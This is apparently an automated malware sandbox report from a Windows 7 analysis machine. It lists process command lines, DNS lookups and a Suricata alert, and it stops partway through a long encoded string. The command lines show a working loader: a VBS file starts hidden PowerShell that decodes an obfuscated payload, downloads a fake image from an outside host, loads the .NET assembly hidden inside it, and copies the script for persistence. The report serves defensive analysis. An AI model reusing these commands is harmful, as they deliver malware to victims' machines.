Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Oct. 26, 2023, 5:18 p.m. | Oct. 26, 2023, 5:20 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLcachesIE.vbs
2996-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
932-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
2476
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
2228
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.67.53.27 |
uploaddeimagens.com.br | 104.21.45.138 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49166 -> 104.21.45.138:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49166 104.21.45.138:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=uploaddeimagens.com.br | d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71 |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force } |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtç